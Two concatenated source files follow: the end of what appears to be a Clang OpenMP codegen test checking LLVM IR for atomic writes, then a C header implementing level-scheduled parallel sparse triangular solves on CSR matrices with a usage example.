// CHECK: [[PREV_VALUE:%.+]] = load atomic i64, i64* bitcast (%struct.BitFields4* @{{.+}} to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i64 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[ZEXT:%.+]] = zext i32 [[NEW_VAL]] to i64
// CHECK: [[BF_AND:%.+]] = and i64 [[ZEXT]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i64 [[BF_AND]], 16
// CHECK: [[BF_CLEAR:%.+]] = and i64 %{{.+}}, -65537
// CHECK: or i64 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i64 %{{.+}}, i64* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i64, i64* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (%struct.BitFields4* @{{.+}} to i64*), i64 [[OLD_BF_VALUE]], i64 [[NEW_BF_VALUE]] monotonic monotonic, align 8
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i8
// CHECK: [[BF_VALUE:%.+]] = and i8 [[TRUNC]], 1
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, -2
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i64
// CHECK: [[PREV_VALUE:%.+]] = load atomic i64, i64* bitcast (%struct.BitFields4* @{{.+}} to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i64 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i64 [[NEW_VAL]], 127
// CHECK: [[BF_VALUE:%.+]] = shl i64 [[BF_AND]], 17
// CHECK: [[BF_CLEAR:%.+]] = and i64 %{{.+}}, -16646145
// CHECK: or i64 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i64 %{{.+}}, i64* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i64, i64* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (%struct.BitFields4* @{{.+}} to i64*), i64 [[OLD_BF_VALUE]], i64 [[NEW_BF_VALUE]] monotonic monotonic, align 8
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx4.b = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i64
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i64 [[NEW_VAL]] to i8
// CHECK: [[BF_AND:%.+]] = and i8 [[TRUNC]], 127
// CHECK: [[BF_VALUE:%.+]] = shl i8 [[BF_AND]], 1
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, 1
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr inbounds (%struct.BitFields4_packed, %struct.BitFields4_packed* @{{.+}}, i32 0, i32 0, i64 2), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic relaxed write
bfx4_packed.b = ldv;
// CHECK: load i64, i64*
// CHECK: [[VEC_ITEM_VAL:%.+]] = uitofp i64 %{{.+}} to float
// CHECK: [[I64VAL:%.+]] = load atomic i64, i64* bitcast (<2 x float>* [[DEST:@.+]] to i64*) monotonic, align 8
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_I64:%.+]] = phi i64 [ [[I64VAL]], %{{.+}} ], [ [[FAILED_I64_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BITCAST:%.+]] = bitcast <2 x float>* [[LDTEMP:%.+]] to i64*
// CHECK: store i64 [[OLD_I64]], i64* [[BITCAST]],
// CHECK: [[VEC_VAL:%.+]] = load <2 x float>, <2 x float>* [[LDTEMP]]
// CHECK: [[NEW_VEC_VAL:%.+]] = insertelement <2 x float> [[VEC_VAL]], float [[VEC_ITEM_VAL]], i64 0
// CHECK: store <2 x float> [[NEW_VEC_VAL]], <2 x float>* [[LDTEMP]]
// CHECK: [[NEW_I64:%.+]] = load i64, i64* [[BITCAST]]
// CHECK: [[RES:%.+]] = cmpxchg i64* bitcast (<2 x float>* [[DEST]] to i64*), i64 [[OLD_I64]], i64 [[NEW_I64]] monotonic monotonic, align 8
// CHECK: [[FAILED_I64_OLD_VAL:%.+]] = extractvalue { i64, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i64, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write relaxed
float2x.x = ulv;
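// rix is read through llvm.read_register (it is presumably bound to a machine
// register earlier in the test), converted to double, and stored with a
// seq_cst atomic store; the seq_cst clause also emits the trailing
// __kmpc_flush call.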
// CHECK: call i32 @llvm.read_register.i32(
// CHECK: sitofp i32 %{{.+}} to double
// CHECK: bitcast double %{{.+}} to i64
// CHECK: store atomic i64 %{{.+}}, i64* bitcast (double* @{{.+}} to i64*) seq_cst, align 8
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic write seq_cst
dv = rix;
return 0;
}
#endif
|
fs_csr_executor.h |
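/*
 * Level-scheduled sparse triangular solve (forward substitution) on CSR
 * storage. Solves Lx = b for a lower-triangular L whose diagonal entry is
 * stored last in each row. levelPtr/levelSet group the rows into levels
 * (wavefronts): rows within one level are mutually independent, so each
 * level is solved in parallel while the levels themselves run in
 * dependency order.
 */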
void fs_csr_executor (int n, int* rowPtr, int* colIdx, double* val, double *b, double *x,
int levels, int *levelPtr, int *levelSet, int chunk){
for (int l = 0; l < levels; ++l) {
int li=0;
#pragma omp parallel for default(shared) private(li) schedule(auto)
for ( li = levelPtr[l]; li < levelPtr[l + 1]; ++li) {
int i = levelSet[li];
      double tmp = b[i];
for (int j=rowPtr[i]; j<rowPtr[i+1]-1;j++) {
tmp -= val[j]*x[colIdx[j]];
}
x[i] = tmp / val[rowPtr[i+1]-1];
}
}
}
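/*
 * H2 variant: each level is additionally split into partitions
 * (parPtr/partition), so a thread claims a whole block of rows per
 * iteration rather than a single row, presumably to coarsen the work
 * units and improve locality.
 */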
void fs_csr_executor_H2 (int n, int* rowPtr, int* colIdx, double* val, double *b, double *x,
int levels, int *levelPtr, int *levelSet,
int parts, int *parPtr, int *partition,
int chunk){
for (int i1 = 0; i1 < levels ; ++i1) {
  #pragma omp parallel
{
#pragma omp for schedule(auto)
for (int j1 = levelPtr[i1]; j1 < levelPtr[i1 + 1]; ++j1) {
for (int k1 = parPtr[j1]; k1 < parPtr[j1 + 1]; ++k1) {
int i = partition[k1];
double tmp = b[i];
for (int j=rowPtr[i]; j<rowPtr[i+1]-1;j++) {
tmp -= val[j]*x[colIdx[j]];
}
x[i] = tmp / val[rowPtr[i+1]-1];
}
}
}
}
}
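/*
 * Minimal usage sketch (illustrative; not part of the original file).
 * Solves a 3x3 dense lower-triangular system with one row per level,
 * assuming, as the solver requires, that the diagonal entry is stored
 * last in each CSR row.
 */
static void fs_csr_executor_example(void)
{
  /* L = [2 0 0; 1 2 0; 1 1 2], b = [2 5 9]  =>  x = [1 2 3] */
  int rowPtr[]   = {0, 1, 3, 6};
  int colIdx[]   = {0, 0, 1, 0, 1, 2};
  double val[]   = {2.0, 1.0, 2.0, 1.0, 1.0, 2.0};
  double b[]     = {2.0, 5.0, 9.0};
  double x[3];
  int levelPtr[] = {0, 1, 2, 3};  /* each row is its own wavefront */
  int levelSet[] = {0, 1, 2};
  fs_csr_executor(3, rowPtr, colIdx, val, b, x, 3, levelPtr, levelSet, 1);
}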
|